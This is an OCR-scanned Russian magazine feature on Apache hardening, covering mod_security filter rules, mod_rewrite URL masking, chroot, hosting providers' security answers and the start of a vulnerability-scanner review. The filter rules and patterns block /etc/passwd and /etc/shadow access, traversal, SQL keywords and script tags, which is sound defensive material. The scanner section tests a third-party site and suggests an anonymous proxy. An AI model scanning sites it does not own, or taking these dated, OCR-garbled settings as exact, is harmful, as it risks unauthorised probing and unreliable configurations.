в правилах модуля, чтобы сервер стал безопаснее? 
Рассмотрим несколько несложных примеров. 


1 В СТРОКЕ URL HE ДОЛЖНО БЫТЬ НИ- 
КАКИХ ОБРАЩЕНИЙ К ФАЙЛУ /ETC/PASS- 
М/О, А ЗНАЧИТ, ПУТИ К ЭТОМУ ФАЙЛУ 

НЕ ДОЛЖНЫ БЫТЬ В УВЕ-АДРЕСЕ. 


2 ЧЕРЕЗ URL HE ДОЛЖЕН ПЕРЕДАВАТЬ- 
СЯ КОД JAVASCRIPT, ЭТО СЕРЬЕЗНАЯ 
ОШИБКА. ТАКИЕ ВЕЩИ НУЖНО ПЕРЕДА- 
ВАТЬ МЕТОДОМ РОЗТ. ЕСЛИ ЗАПРЕТИТЬ 
<SCRIPT> И ПРОИЗВОДНЫЕ, ТО МОЖНО 
ОБЛЕГЧИТЬ СЕБЕ ЖИЗНЬ. НО ТОЛЬКО 
ОБЛЕГЧИТЬ, ТАК КАК ЕСТЬ КУЧА ПРОИЗ- 
ВОДНЫХ, ПЛЮС КОДИРОВАНИЕ СОДЕР- 
ЖИМОГО СТРОКИ. ХАКЕР МОЖЕТ ЗАМУ- 
ТИТЬ ТАКОЙ ЗАПРОС, КОТОРЫЙ ОБОЙ- 
ДЕТ ФИЛЬТРЫ, НО УСЛОЖНИТЬ ЕМУ 
ЖИЗНЬ ТЫ ПРОСТО ОБЯЗАН. 


3 В URL НЕ ДОЛЖНО БЫТЬ ОДИНАРНОЙ 
КАВЫЧКИ, А ВСЕ ПАРАМЕТРЫ, ПЕРЕДА- 
ВАЕМЫЕ СЦЕНАРИЮ, ПРИ ИСПОЛЬЗОВА- 
НИИ В ЗАПРОСАХ ОБЯЗАТЕЛЬНО ДОЛЖ- 
НЫ БЫТЬ ЗАКЛЮЧЕНЫ В ОДИНАРНЫЕ 
КАВЫЧКИ. 


Модуль mod_security проверяет на основе заданных 
фильтров адрес URL, и если он нарушает правила, 
то запрос отклоняется. Сам модуль можно взять 
с сайта www.modsecurity.org. После установки в фай- 
ne httpd.conf можно будет использовать дополни- 
тельные директивы: 


~~ SECFILTERENGINE ОМ 
ВКЛЮЧИТЬ РЕЖИМ ФИЛЬТРАЦИИ 
ЗАПРОСОВ; 


~~ SECFILTERCHECKURLENCODING ON 
ПРОВЕРЯТЬ КОДИРОВКУ; 


~~ SECFILTERFORCEBYTERANGE 32 126 
РАЗРЕШАТЬ ИСПОЛЬЗОВАНИЕ CUMBO- 
ЛОВ С КОДАМИ ТОЛЬКО ИЗ УКАЗАННО- 
ГО ДИАПАЗОНА. 


Символы, коды которых менее 32, принадлежат слу- 
жебным символам типа перевода каретки или конца 
строки. Большинство из этих символов невидимы, но 
для них существуют коды, чтобы можно было обра- 
батывать нажатия соответствующих клавиш на кла- 
виатуре. То есть хакер не может ввести невидимый 
символ в URL, но вполне может ввести его код. Нап- 
ример, чтобы указать символ с кодом 13, необходи- 
мо указать в URL адресе «%13». Символы менее 32 
и более 126 являются недопустимыми для адреса, 
поэтому вполне логично их отсекать еще до обработ- 
ки web-cepBepom. 


— SECAUDITLOG LOGS/AUDIT_LOG 
С ПОМОЩЬЮ ЭТОГО ПАРАМЕТРА ЗАДА- 
ЕТСЯ ФАЙЛ ЖУРНАЛА, В КОТОРОМ БУ- 
ДЕТ СОХРАНЯТЬСЯ ИНФОРМАЦИЯ 
ОБ АУДИТЕ; 


— SECFILTERDEFAULTACTION 
«DENY,LOG,STATUS:406» — ПАРАМЕТР 
ЗАДАЕТ ДЕЙСТВИЕ ПО УМОЛЧА- 

НИЮ (В ДАННОМ СЛУЧАЕ УКАЗАН 
ПО УМОЛЧАНИЮ ЗАПРЕТ — DENY): 


—` SECFILTER XXX REDIRECT: 
HTTP://WWW.WEBKREATOR.COM — ЕСЛИ 
ФИЛЬТР СРАБАТЫВАЕТ, TO ПОЛЬЗОВА- 
ТЕЛЬ ПЕРЕАДРЕСУЕТСЯ НА САЙТ 
HTTP://WWW.WEBKREATOR.COM; 


“ SECFILTER YYY LOG, 
EXEC:/HOME/APACHE/REPORT-AT- 
TACK.PL — ЕСЛИ ФИЛЬТР СРАБАТЫВАЕТ, 
ТО БУДЕТ ВЫПОЛНЕН СЦЕНАРИЙ 
/HOME/APACHE/REPORT-ATTACK.PL; 


~~ SECFILTER /ETC/PASSWORD 
В ЗАПРОСЕ ПОЛЬЗОВАТЕЛЯ HE ДОЛЖНО 
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Jail упрощает создание индивидуального окружения 


БЫТЬ ОБРАЩЕНИЯ К ФАЙЛУ 
/ETC/PASSWD (ТАКИМ ЖЕ ОБРАЗОМ 
СЛЕДУЕТ ДОБАВИТЬ ЗАПРЕТ 

НА ОБРАЩЕНИЕ К ФАЙЛУ /ETC/SHADOW); 


—_ SECFILTER /BIN/LS 
В ЗАПРОСЕ ПОЛЬЗОВАТЕЛЯ HE ДОЛЖНО 
БЫТЬ ОБРАЩЕНИЯ К ПРОГРАММАМ 
(В ДАННОМ СЛУЧАЕ ЗАПРЕЩАЕТСЯ 
КОМАНДА 1$, КОТОРАЯ МОЖЕТ ПОЗВО- 
ЛИТЬ ХАКЕРУ УВИДЕТЬ СОДЕРЖИМОЕ 
КАТАЛОГОВ, ЕСЛИ В СЦЕНАРИИ ЕСТЬ 
ОШИБКА), СТОИТ ЗАПРЕТИТЬ 
ОБРАЩЕНИЯ К ТАКИМ КОМАНДАМ КАК 
САТ, ВМ, СР, ЕТР И ДРУГИМ; 


~~ SECFILTER «\.\./» 
КЛАССИЧЕСКАЯ АТАКА, КОГДА 
В URL УКАЗЫВАЮТСЯ СИМВОЛЫ 
ТОЧЕК, ПОЭТОМУ ИХ ТАМ БЫТЬ 
НЕ ДОЛЖНО; 


—` SECFILTER «DELETE[[:SPACE:]]+-ROM» 
ЗАПРЕТ ТЕКСТА DELETE ... FROM, 
ЧТО ЧАЩЕ ВСЕГО ИСПОЛЬЗУЕТСЯ 
В SQL-3ANPOCAX ДЛЯ УДАЛЕНИЯ 
ДАННЫХ. 


Помимо этого рекомендуется установить следую- 
щие три фильтра: 


1 SECFILTER «INSERT|[:SPACE:]]+INTO» 
ИСПОЛЬЗУЕТСЯ В SQL-3AMPOCAX 
ДЛЯ ДОБАВЛЕНИЯ ДАННЫХ. 


2 SECFILTER «SELECT.+FROM» 
ИСПОЛЬЗУЕТСЯ В SQL-3ANPOCAX 
ДЛЯ ЧТЕНИЯ ДАННЫХ ИЗ БАЗЫ. 


3 SECFILTER «<(.\№)+>» И SECFILTER 
«<[[:SPACE:]]*SCRIPT» — ПОЗВОЛЯЕТ 
ЗАЩИТИТЬСЯ OT XSS-ATAK. 


> mod_rewrite. Это модуль, который позволя- 
ет преобразовывать URL-agpeca из одного вида 
в другой. Ты видел большие порталы, в которых 
все страницы имеют расширение .html и при этом 
сайты — динамические, миллион раз. Но ведь 
построить на статичных Рит!-страницах большой 
динамический портал не реально! На самом деле, 
под статикой прячутся РНР или любые другие 
сценарии, просто пользователь видит дымовую 
завесу, которая шифрует внутренности исполне- 
ния. Это достигается как раз с помощью модуля 
mod_rewrite, который пускает хакеру пыль в гла- 


ЫМОХ-ОКРУЖЕНИЕ 


Конечно, если ты работаешь с Linux, 
ина одном сервере должно находиться 
несколько сайтов, то каждый из них же- 
лательно разместить в своей среде 
chroot. В отдельный chroot вместе с ди- 
ректорией сайта необходимо убирать 
и Web-CepBep. Этот же финт нужно де- 
лать и тогда, когда на одном железе ве- 
риться не только Web, но и другие сер- 
висы, например почта. В этом случае, 
взломав, к примеру, сайт, хакер не смо- 
жет получить доступ к почте. 

Принцип работы chroot простой. 
Для начала создается  директо- 
рия (в Linux для этого существует коман- 
да chroot), которая является для прог- 
раммы корневой. Выше этой директории 
программа, помещенная в закрытое ок- 
ружение, попасть не может. Чтобы про- 
ще было конфигурировать chroot, реко- 
мендуем использовать утилиту jail. Она 
реально упрощает конфигурирование. 

На схеме окружения chroot показана 
часть файловой системы Linux. Bo гла- 
ве всего стоит корневая директория «/». 
В ней находятся /bin, /etc, /home, /usr 
ит.д. В /home расположены каталоги 


пользователей системы. Создаем новую 
директорию, для примера называем ее 
chroot. Она будет являться корнем для 
службы. В ней будут свои каталоги /bin, 
/изгит.д. И служба будет работать с ни- 
ми, а все, что выше /home/chroot, будет 
недоступно. Просто она будет считать, 
что /home/chroot — это и есть корень 
файловой системы. 

На рисунке в рамку обведены папки, 
которые будут видны службе. Именно 
в этом пространстве она будет работать. 
Если хакер проникнет в систему через 


защищенную службу и захочет прос- 
мотреть каталог /etc, то он увидит ката- 
лог /home/chroot/etc, но никак He сис- 
темный /etc. Чтобы взломщик ничего не 
заподозрил, в каталоге /home/chroot/etc 
можно расположить все необходимые 
файлы. Запросив файл /etc/passwd че- 
рез уязвимую службу, хакер получит 
доступ к /home/chroot/etc/passwd. А файл 
/home/chroot/etc/passwd, в свою очередь, 
может содержать неверные пароли. На 
работу системы в целом это не повлия- 
ет, а дезинформация хакеру обеспечена. 


bin usr 


var home 


bin bin 


bin usr 


var home 
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за, а заодно позволяет реализовать очень эф- 
фективные фильтры. 

Mod_rewrite можно достаточно часто встретить 
у хостеров, но то, что он установлен на сервере, еще 
ни о чем не говорит. Необходима конфигурация, без 
которой модуль работать не будет. Конфигурация 
происходит через файл .htaccess. Чтобы включить 
модуль, можно добавить следующие три строки: 


В первой строке с помощью установки значения ди- 
рективы RewriteEngine в Оп включаем сам модуль. 
Следующая строка включает опцию FollowSymlinks, 
которая разрешает преобразование символьных 
ссылок. Следующая опция, RewriteBase, позволяет 
изменять базовый URL. 

Допустим, конфигурируем \меБ-директорию 
/documents/article u, соответственно, в ней лежит наш 
„Массез$. Если RewriteBase установить в /erunda, то на 
м/еб-странице необходимо будет использовать URL 
/erunda/filename.php. Получив такой URL, сервер пре- 
образует его в /documents/article/filename.php. Вот и 
первый шаг к безопасности — спрятали директорию 
/documents/article, где реально находится сценарий, 
а показали полную ерунду, то есть /erunda. Не зная ре- 
ального положения сценариев, хакеру будет сложнее 
обойти защиту, которую мы будем мутить дальше. 

Самое вкусное — правила преобразований 
того, что будет видеть пользователь. Для этого ис- 
пользуется директива RewriteRule. Эта директива 
имеет следующий вид: 


Первый параметр — это виртуал, то есть то, что 
web-cepBep получает в качестве URL (то, что преоб- 
разовывается). А реал — это реальный файл и его 
параметры, в которые нужно преобразовать. 
Чтобы было понятнее, рассмотрим работу ди- 
рективы на примере. Допустим, что у тебя есть сце- 
нарий news.php, который отображает определен- 
ную новость. Идентификатор новости передается 
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Схема работы mod_rewrite 


через параметр id. То есть реальный URL для прос- 
мотра новости под номером 1 будет выглядеть так: 


Чтобы хакер не видел этого, делаем следующую 
маскировку: 


Теперь для просмотра новости необходимо будет 
набрать в URL: 


Получив такой виртуальный URL, модуль mod_rewrite 
преобразует его в реальный http://www.TBou_cep- 
Bep.ru/news.php?id=1 и корректно выполнит. 

Посмотрим, как мы добились такого счастья, 
разобрав директиву по частям: 


“~ REWRITERULE 
НАЧАЛО ПРАВИЛА. 


— NEWS_([0-9]*).HTM 
ШАБЛОН, ОПРЕДЕЛЯЮЩИЙ, КАК БУДЕТ 
ВЫГЛЯДЕТЬ URL ДЛЯ ПОЛЬЗОВАТЕЛЯ. 


В самом начале стоит символ крыши. Нет, это 
не бандиты, которые будут предоставлять нам кры- 
ly, это такой символ (^), обозначающий начало 
строки :). После этого идет текстовая статическая 
часть (news_), которая будет выделять шаблон из 
массы других. Ведь на сайте могут быть еще 
и статьи, и форум, и еще много чего интересного. 
Затем в скобочках указываем шаблон того, что мо- 
жет быть в этом месте URL-agpeca. Так как иденти- 


фикатор новости — это число, то шаблон выглядит 
так: [0-9] — любые символы от нуля до девяти, пос- 
ле стоит звездочка, которая говорит, что цифр мо- 
жет быть несколько. После шаблона снова идет ста- 
тическая часть: 


Благодаря шаблону убиваем двух зайцев, и еще од- 
ного разрываем в клочья :). Первый заяц заключа- 
ется в том, что мы прячем реальный РНР-сценарий. 
Второй заяц — это то, что хакер не видит имя пара- 
метра. Ну, а третий заяц, которого просто порва- 
ло — это то, что хакер не сможет передать сцена- 
рию ничего, кроме чисел. Шаблон [0-9] вырезает 
любые буквы и символы, а значит, инъекция стано- 
вится невозможной. 

Но если хакер вычислит реальный сценарий и 
его параметр, то мы не то что зайцев не убьем, мы 
даже муху He испугаем! Обратившись к news.php 
напрямую, хакер обходит все правила mod_rewrite. 

Чтобы хакер не смог обратиться к физичес- 
ким файлам на сервере, можно выполнить одно из 
следующих условий: 


1 ЗАПРЕТИТЬ ПРЯМОЙ ДОСТУП К 
РНР-СЦЕНАРИЯМ, ЧТОБЫ ХАКЕРУ 
ПРИШЛОСЬ ИСПОЛЬЗОВАТЬ ВИРТУАЛЬ- 
НУЮ ПЫЛЬ, КОТОРУЮ МЫ НАПУСТИЛИ. 


2 НИКОГДА НЕ НАЗЫВАТЬ СЦЕНАРИИ 
ПОНЯТНЫМИ ИМЕНАМИ. 


Главная страница никогда не должна иметь имя in- 
dex.php или main.php, назови ее лучше enter_to_my_pri- 
vate.php или еще позабористей. За новости He дол- 


жен отвечать сценарий News.php, его лучше наз- 
вать my_99545_news.php. Та же песня и с парамет- 
рами — забудь про id, sid, index, start, раде ит.д. И, 
конечно же, Ha mod_rewrite надейся, а сам не пло- 
шай. Проверяй все в сценарии собственноручно, 
чтобы предотвратить атаки. Это, как говорится, без 
комментариев и должно выполняться вне зависи- 
мости от установленных дополнительных средств 
контрацепции. 

Выше мы рассмотрели простой пример с но- 
востями, когда через параметры передается число. 
А что если нужно передавать строку? Да без проб- 
лем, просто пишешь следующий шаблон: 


Этот шаблон позволяет передавать не только чис- 
ла, но и буквы ота до 2. Это тоже не опасно, глав- 
ное — не разрешать использовать символы одинар- 
ной кавычки, запятые, тире и т.п. Буквы и цифры 
не несут в себе такой опасности, как символы. 

> = итого. При правильном конфигурировании сер- 
вера и с помощью дополнительных модулей можно 
защититься даже от ужасных сценариев, которые 
просто кишат ошибками SQL Injection или Х$$. Если 
сервер все же взломали, то виноват не только прог- 
раммист, но и администратор. 

С другой стороны, программист не должен 
надеяться на админа, что тот настроит сервер мак- 
симально безопасно. А администратор, в свою оче- 
редь, не должен уповать на код и на то, что прог- 
раммист не совершит ошибок. © 


www.modsecurity.org 
модуль mod_security 


http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html 
модуль mod_rewrite 
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КОНКУРС ДЛЯ ЧИТАТЕЛЕЙ СПЕЦА! 

МЫ ПРОВОДИМ КОНКУРС НА ЛУЧШУЮ СТАТЬЮ ОТ НАШИХ ЧИТАТЕЛЕЙ! ТЫ ОТЛИЧНО РАЗБИ- 
РАЕШЬСЯ В СОВРЕМЕННЫХ ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЯХ? ДЛЯ ТЕБЯ НЕТ СЕКРЕТОВ 

В ПРОГРАММИРОВАНИИ? МОЖЕШЬ СДЕЛАТЬ КРУТЕЙШИЙ ВЕБ-САЙТ ДАЖЕ В БЛОКНОТЕ, 
НАДЕЖНО ЗАЩИТИШЬ ОТ ВТОРЖЕНИЯ СЕТЬ ЛЮБОГО РАЗМЕРА? ЗНАЕШЬ ЧТО-ТО ТАКОЕ, 
ЧТО БУДЕТ ИНТЕРЕСНО ДРУГИМ, И ИЩЕШЬ СПОСОБ ПОДЕЛИТЬСЯ ИНФОРМАЦИЕЙ? ТОГДА 
ТЫ ПРИШЕЛ ПО АДРЕСУ! НАПИШИ СТАТЬЮ НАТУ ТЕМУ, КОТОРАЯ ТЕБЕ НАИБОЛЕЕ БЛИЗКА, 
В КОТОРОЙ ТЫ РАЗБИРАЕШЬСЯ ЛУЧШЕ ВСЕХ И ПРИШЛИ ЕЕ НАМ. 


Следи за публикуемыми списками победителей. 
Лучшие авторы получат ценные цифровые призы 
от журнала «СПЕЦ, и наших партнеров! 


УСЛОВИЯ УЧАСТИЯ В конкурсе будут участвовать статьи, присланные до 1 июля 2007 года. Статьи должны 

В КОНКУРСЕ: соответствовать тематике журнала. Объем статьи должен быть не менее 9 тысяч знаков 
(с пробелами). Статья должна включать в себя иллюстрации (картинки, фотографии, 
скриншоты). 


Критериями оценки будут выступать: техническая грамотность, интересность и необычность, 
полезность, литературная грамотность, стиль написания и легкость чтения материала. 


ПРИЗЫ: Третье место: цифровай фотокамера Samsung NV-7 с 7-мегапиксельным разрешением 
и 7-кратным зум-объективом Schneider-Kreuznach. Все это собрано воедино в легком 
и стильном корпусе из черного алюминиего сплава, который надежно защитит аппарат 
от случайных столкновений с твердыми предметами. 


Мы хотим, чтобы ты действительно постарался, выложился на все сто. Поэтому, чтобы 
подстегнуть твое рвение и заинтриговать тебя, информацию о призах за 1-ое и 2-ое места 
мы будем держать в секрете. 
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ИСПОЛЬЗУЕТЕ ЛИ ВЫ 
ПРОГРАММЫ ДЛЯ ТЕСТИРОВАНИЯ 
БЕЗОПАСНОСТИ СЕРВЕРОВ? 


ЧТО ДЕЛАЕТЕ ДЛЯ ПРЕДОТВРАЩЕНИЯ 
ВЗЛОМОВ? 


SL.RU: Для тестирования безопасности серверов используем различные открытые (OpenSource) сред- 
ства. Тестируем работу сайтов и виртуальных выделенных серверов под нагрузкой, моделируя большое 
количество обращений (httpload). Также проводим анализ программ, установленных на виртуальном 
сервере (rootkit check) или на сайте — системы управления сайтами, форумы или другие популярные 
приложения. Сам трафик анализируем системой обнаружения вторжений (IDS) Snort. 
HOST-PLANET.RU: Поиск уязвимостей мы осуществляем с помощью программных пакетов Port 
Sentry, Snort, IPPL. Большинство из них занимается протоколированием входящих пакетов, но также 
мы используем и сканеры сети, например пакет courtney, написанный на Perl. Он позволяет фильтро- 
вать информационные потоки, приходящие на сетевые интерфейсы серверов, и отслеживать опреде- 
ленные шаблоны данных. 

KOSMOHOST.COM: Программы для тестирования безопасности серверов не используем. В основном 
защищаем серверы стандартными методами iptables + антивирус (Clamav) + настройка сервисов. 

На данный момент основная проблема при защите серверов — это, конечно же, распространенные 
движки сайтов, то есть различные форумы, CMS, блоги и т.п. Особенно не обновленные и так 
называемые «нуленные версии». Зачастую злоумышленник, зная, как работает такой скрипт, 
использует найденную в коде уязвимость (обычно известную любому школьнику) и заливает свой 
скрипт в папку с временными файлами, после чего запускает этот скрипт. Пытается тратить ресурсы 
сервера впустую или прочесть данные с логинами, паролями и другую крайне важную информацию. 
Поэтому о защите сервера и владелец сайта должен не забывать, своевременно обновляя свои скрип- 
ты, тем самым, как минимум, закрывая известные уязвимости. 

PETERHOST.RU: Для обеспечения безопасности серверов компания PeterHost.Ru использует 
программно-административный комплекс собственной разработки. Мы опираемся на стандартные 
решения, однако никогда не внедряем их без предварительной доработки. В комплекс входят методы 
настройки серверов, набор тестов для выявления возможных «дыр» в защите сервера, а также доволь- 
но сложная система мониторинга, позволяющая оперативно определить атаку, выявить адреса, с кото- 
рых она ведется, и ее цель. В случае спамоподачи с наших серверов система позволяет быстро и точно 
определить пользователя, рассылающего спам. 

HOSTER.RU: Стандартные программы по аудиту безопасности мы не используем. 7 лет работы в об- 
ласти хостинга позволили компании накопить опыт по настройке, тестированию и защите серверов. 
Многочисленные сайты клиентов, некоторые из которых являются объектом пристального внимания со 
стороны хакеров, дают неоценимый опыт при разработке безопасности системы. На данный момент на- 
ибольшее внимание уделяется методам защиты от DDOS. 


SL.RU: Обновляем программное обеспечение на собственных серверах по мере выпуска новых 
версий приложений. Клиентам предоставляем простой и удобный интерфейс для обновления 
программ на стороне пользователя (нажатием одной кнопки), подписываем на автоматическое 
обновление программ провайдером — на их сайте или выделенном сервере. В начальной установке 
сайт/УР$ содержит только минимум программ (РНР, FTP, Sendmail). Если пользователю нужны 
другие программы, он может их добавить самостоятельно. Между приложениями применяется 
принцип «максимального использования локальных соединений» (например, между РНР и MySQL). 
То есть сетевые отключать, но если это не возможно, ограничивать входящие сетевые подключения 
FireWall (разрешено только определенным IP, остальным запрещено). Если нужен доступ 

со всех IP — ограничение по имени пользователя и паролю. Сетевой трафик анализируется IDS. 
Лог-файлы программ обрабатываются фильтрами, опасные/необычные записи отправляются 

на етай администратора. 

HOST-PLANET.RU: Защита сети серверов — это не только регулярный просмотр журналов, 
проверка функционирования брандмауэра и блокирование узлов, для которых доступ внутрь 

сети запрещен. Для нас защита сети — интеллектуальный процесс. Мы должны поставить себя 

на место злоумышленника, пытающегося проникнуть внутрь, приступить к поиску собственных уязви- 
мых мест, проанализировать эти уязвимости и принять меры, чтобы обезопасить наши серверы от атак. 
Чтобы узнать о существовании уязвимых мест, их надо искать — лучшего средства не существует. Ну, 
и, конечно же, мы включаем РНР-параметр safe_mode. 

KOSMOHOST.COM: Для предотвращения взломов используем модифицированный под нашу 
систему скрипт Nobody Check и собственные наработки. 

PETERHOST.RU: Безопасность наших собственных серверов обеспечивается мерами, описанными 
выше. Сайты клиентов обычно взламываются через установленный на них небезопасный софт. 

По мере возможности наша компания, как и другие хостеры, старается это предотвратить путем 
тестирования клиентских сайтов. Однако нужно понимать, что гарантии полной безопасности здесь 
давать невозможно. Например, у нашей компании более 8 тысяч клиентов, практически у каждого 
из них по несколько сайтов. На комплексное тестирование каждого сайта потребовалось бы огром- 
ное количество времени и средств. Поэтому мы выявляем самые распространенные «дыры» — 


УСТАНОВЛЕНЫ ЛИ ДОПОЛНИТЕЛЬНЫЕ 
МОДУЛИ ДЛЯ ПРЕДОТВРАЩЕНИЯ АТАК? 


В КАКОМ ОКРУЖЕНИИ РАБОТАЮТ 
САЙТЫ (В ОБЩЕМ ИЛИ КАЖДЫЙ 
РАБОТАЕТ В СВОЕЙ СРЕДЕ CHROOT)? 


КАК ЧАСТО ПРОИСХОДИТ РЕЗЕРВНОЕ 
КОПИРОВАНИЕ ДАННЫХ? 
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производим проверку на установленные устаревшие версии популярных форумов, для которых 
имеются известные уязвимости, на неправильное использование некоторых функций в РНР. 

В случае взлома клиентского сайта, мы анализируем, каким образом это было сделано, сообщаем 
пользователю об ошибках, а потом проверяем другие сайты на наличие следов взлома аналогичным 
способом (через анализ логов). 

HOSTER.RU: В практике компании не было случаев взлома наших серверов. Постоянный мониторинг 
процессов на сервере позволяет находить отклонения или обнаруживать факты взлома клиентских сайтов. 


SL.RU: Специальных модулейу нас нет, атаки обнаруживаются IDS (онлайн), частично пресекаются 
Firewall (linux — iptables, Cisco PIX ит.д.) или на основе анализа лог-файлов (оффлайн). Для борьбы 

с DDoS-atakamu используем собственные программы, которые динамически вносят изменения в Firewall, 
получая данные от анализаторов трафика. 

HOST-PLANET.RU: Мы используем обратный прокси mod_security с рядом установок, способствующих 
отклонению запросов, которые могут представлять опасность. 

KOSMOHOST.COM: Защищаемся при помощи iptables, то есть по сути отсекаем пакеты, которые 

не могут быть верно идентифицированы, либо производящие большое количество запросов 

с одного IP. Если говорить о mod_security, то его не используем, так как данная система не всегда 
правильно определяет, отсекать остальные запросы c IP или нет. И, если я не ошибаюсь, данный 
модуль является экспериментальным. 

PETERHOST.RU: Для предотвращения атак у нас используется комплекс из модифицированных 
Apache и MySQL и установленного перед веб-сервером акселератора Nginx. Мы можем определить, 
откуда идет атака, куда она направлена и какого она рода. Если выявлены постоянные IP-anpeca 
атакующего ботнета, они блокируются на уровне Nginx или стоящего выше магистрального узла. 

В случае быстрой смены атакующих IP мы можем сменить ОМ№$-серверы. Мы не используем автомати- 
ческие системы предотвращения атак, так как считаем, что в этом случае возможны ошибки. 

Мы детектируем атаку автоматически, но боремся с ней «вручную». Существующая система 
мониторинга позволяет оперативно отследить атаку и своевременно отреагировать на нее. 
HOSTER.RU: Используем собственные разработки для отслеживания и блокирования процессов, 
либо запросов к серверу. 


SL.RU: Виртуальные выделенные серверы (VPS) под Linux работают на основе технологии Virtuozzo 
или ее бесплатного аналога OpenVZ. Под FreeBSD используем технологию jail. Для некоторых виртуаль- 
ных серверов используем Chroot. Эти технологии позволяют изолировать атакуемую систему от осталь- 
ных и не мешать работе других VPS. 

HOST-PLANET.RU: Для каждого клиента настроен Нр-|ай только на его домашнюю директорию. 

Но как такового chroot'a нет, так как мы считаем, что в нем больше недостатков, чем достоинств. 
Текущая политика безопасности серверов удовлетворяет нашим запросам без использования 
chroot. 

KOSMOHOST.COM: Если говорить о скриптах CGI, то каждый скрипт запускается от своего пользова- 
теля. Скрипты РНР запускаются посредством пользователя web-cepBepa Apache (РНР как модуль 
Apache). На данный момент мы рассматриваем вариант перехода на SUPHP, то есть запуск PHP как 
CGI, что должно привести к повышению безопасности серверов. 

PETERHOST.RU: Каждый пользователь работает под своей учетной записью, что в сочетании с при- 
меняемой политикой разграничения прав доступа исключает возможность просмотра и модификации 
файлов других пользователей. 

HOSTER.RU: Аналог chroot. 


SL.RU: Ежедневно в течение недели делается копия изменений файлов данных пользователей. 

Раз в неделю (как правило, в выходные, в период наименьшей нагрузки) делается полный backup 

и архивирование всех данных. Файлы хранятся по одной копии за 1, 2 и З недели в течение 1, 2и3 
месяцев. Полный Баскир — довольно ресурсоемкий и длительный процесс, требует больших объемов, 
для которого также желательно останавливать некоторые процессы. Ежедневно делать это довольно 
сложно, поэтому мы ограничиваемся изменениями (в основном, у пользователей в течение дня меняет- 
ся база данных и небольшое количество файлов, плюс почта). Также пользователи могут самостоятель- 
но из панели управления сделать backup у нас на сервере в любое удобное для них время. 
HOST-PLANET.RU: Ежедневно. 

KOSMOHOST.COM: Резервное копирование данных производится каждую ночь, когда основная часть 
сайтов мало посещается или не посещается вообще. 

PETERHOST.RU: Копирование происходит раз в сутки, бэкапы хранятся от 2 до 7 дней. 

HOSTER.RU: Резервное копирование сайтов клиентов происходит ежедневно. Настройки серверов 
бекапируются по мере внесения изменений в систему. © 


Откуда берутся ошибки? Можно выделить две ос- 
новные проблемы: плохое образование и челове- 
ческий фактор. Тотальная нехватка программис- 
тов лет пять назад стала превращать в кодеров 
всех подряд. Ладно, человек стал программистом 
без специального образования, но надо же учить- 
ся, совершенствоваться, а не «просиживать» рабо- 
yee место за большую зарплату! Сейчас в Европе 
и США с кодингом попроще: стали использовать 
оффшор и открыли кучу представительств в стра- 
нах, где программистов хватает, но качество кода, 
создаваемого в оффшоре и представительствах, 
все же оставляет желать лучшего. 

Все мы «человеки», и все мы ошибаемся, 
и именно человеческий фактор является второй 


пропасти 


Обзор программ поиска уязвимостей на сайте 


ЧЕЛОВЕК — СУЩЕСТВО ПО СВОЕЙ СУТИ ЛЕНИВОЕ, И БОЛЬШИНСТВО ПОЛЕЗНОСТЕЙ В ЭТОМ МИ- 
РЕ ПОЯВИЛОСЬ ИМЕННО ИЗ-ЗА ЛЕНИ И ДЛЯ ОБЛЕГЧЕНИЯ ЖИЗНИ. В ТАКОМ РАЗРЕЗЕ ЛЕНЬ — 
ЭТО НЕ ЗЛО, ЭТО ПРОГРЕСС, И ПРОИЗВОДИТЕЛЬНОСТЬ ТРУДА ОТ ПОДОБНЫХ «ЛЕНИВЫХ» 
ИЗОБРЕТЕНИЙ ПОВЫШАЕТСЯ. ЧТОБЫ НЕ ИСКАТЬ ОШИБКИ НА WEB-CTPAHULIAX РУКАМИ, «ЛЕН- 
ТЯИ» СОЗДАЛИ МНОЖЕСТВО ПРОГРАММ, КОТОРЫЕ МОГУТ ПРОВЕРИТЬ САЙТ НА УЯЗВИМОСТИ 
И ПРОСИГНАЛИЗИРОВАТЬ, ЕСЛИ НАЙДЕНО ЧТО-ТО ПОДОЗРИТЕЛЬНОЕ. ПОПРОБУЕМ РАЗОБ- 
РАТЬСЯ, ТАК ЛИ ЭФФЕКТИВНЫ ПОДОБНЫЕ УТИЛИТЫ. 


Фленов Михаил aka Horrific 
www.vr-online.ru 


значимой проблемой и причиной половины оши- 
бок. Даже профессионалы могут ошибаться в аб- 
солютно очевидных ситуациях. Чисто машинально 
можно поставить не тот символ или из-за невни- 
мательности забыть сделать проверку. 

Искать ошибки вручную не так уж и сложно, 
но достаточно утомительно, и поэтому програм- 
мисты не любят тщательно тестировать свое тво- 
рение, надеясь на правильность кода и всемогу- 
щий авось. А надежда, как говорится, умирает пос- 
ледней, точнее, сразу после взлома. Если переф- 


разировать дедушку Ленина, то нужно тестиро- 
вать, тестировать и еще раз тестировать после 
каждого изменения кода. 

Так нудно просматривать все страницы и все 
параметры... Но надо, Вася, надо! Причем именно 
после каждого изменения кода, даже незначи- 
тельного. Тестировать нужно абсолютно все, ведь 
изменение в одном сценарии или настройках в ба- 
зе данных может привести к ошибке совершенно 
в неожиданном месте и на той странице, сценарий 
которой не был изменен. 


CyD NET Utils 
Wwww.cydsoft.com| 
shareware] 

для России 300 руб 
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CyD NET Utils — набор 
сетевых утилит для об- 
легчения собственной 
жизни. Недавно в прог- 
рамме появился новый 
модуль — Security Test, 
который позволяет 
тестировать сервер на 
наиболее популярные 
уязвимости. На данный 
момент мер-сайты тес- 
тируются Ha SQL Injection, 
XSS, РНР-инклудинг 
uv Tomy подобные yny- 
щения в коде. Алгоритм 
поиска пока не идеа- 
лен, но постоянно со- 
вершенствуется — об- 
новления выкладыва- 
ются каждый месяц. 
Программа может 
работать как напрямую 
с интернетом, так и че- 
рез ргоху-сервер. При 
этом настройки ргоху 
можно сохранить гло- 
бально для всех тестов 
программы или выб- 
рать индивидуально для 
каждого конкретного, 
кпримеру, если хочешь 
сделать тест через ано- 
нимный прокси, чтобы 
тебя никто не вычислил. 
Для теста програм- 
мы проверим сайт 
www.apahelpcenter.org. За- 
пусти программу и вы- 


2 ватт 


бирай в меню 

«File Security test». 

В появившемся окне 
нажимаешь кнопку 
«Test web server», она 
первая на панели 
инструментов окна 
«Security test». Перед 
тобой появится окно, 
где нужно указать URL 
сайта, который необхо- 
димо протестировать, 
инастройки соединения 
(прямой коннект или 
через прокси-сервер). 
В качестве URL указыва- 
ем www.apahelpcenter.org 
и нажимаем ОК. Понес- 
лась. Хотя алгоритм 

не сильно напрягает 
